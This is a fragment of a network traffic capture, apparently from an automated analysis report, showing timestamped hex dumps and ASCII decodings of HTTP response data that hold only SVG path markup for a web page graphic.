                                                                                                                                                                              2023-09-15 05:27:28 UTC2340INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                              Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                              2023-09-15 05:27:28 UTC2356INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                              2023-09-15 05:27:29 UTC2372INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                              Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                              2023-09-15 05:27:29 UTC2388INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                              2023-09-15 05:27:29 UTC2404INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                              Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                              2023-09-15 05:27:29 UTC2420INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                              Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                              2023-09-15 05:27:29 UTC2436INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                              Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                              2023-09-15 05:27:29 UTC2452INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                              Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                              2023-09-15 05:27:29 UTC2468INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                              Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                              2023-09-15 05:27:29 UTC2484INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                              Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                              2023-09-15 05:27:29 UTC2500INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                              Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                              2023-09-15 05:27:29 UTC2516INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                              2023-09-15 05:27:29 UTC2532INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                              Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                              2023-09-15 05:27:29 UTC2548INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                              Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                              2023-09-15 05:27:29 UTC2564INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                              Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                              2023-09-15 05:27:29 UTC2580INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                              Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                              2023-09-15 05:27:29 UTC2596INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
